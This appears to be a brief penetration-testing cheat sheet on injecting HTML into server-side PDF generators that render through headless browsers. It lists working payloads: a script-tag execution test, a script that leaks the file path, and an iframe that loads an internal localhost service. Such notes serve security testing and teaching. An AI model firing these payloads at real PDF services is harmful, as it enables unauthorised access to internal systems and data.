../pdf-generation-injection

PDF Injection

Concept

To perform PDF generation most library render the HTML in a headless browser and use a feature similar to the print inside most browser.

Profile Pic

So at render time we have access to a browser that may not have been patch against most common vulnerabilities like some JS function.

Profile Pic

Example of payloads

Test for javascript injection

<script>document.write('test')</script>

Path extraction

<script>document.write(window.location)</script>

Internal site overview

<iframe src="http://127.0.0.1:8080/" width="500" height="500"></iframe>

If it doesn’t work, test to call an external website which will performe the get

Ressources

Good Explaination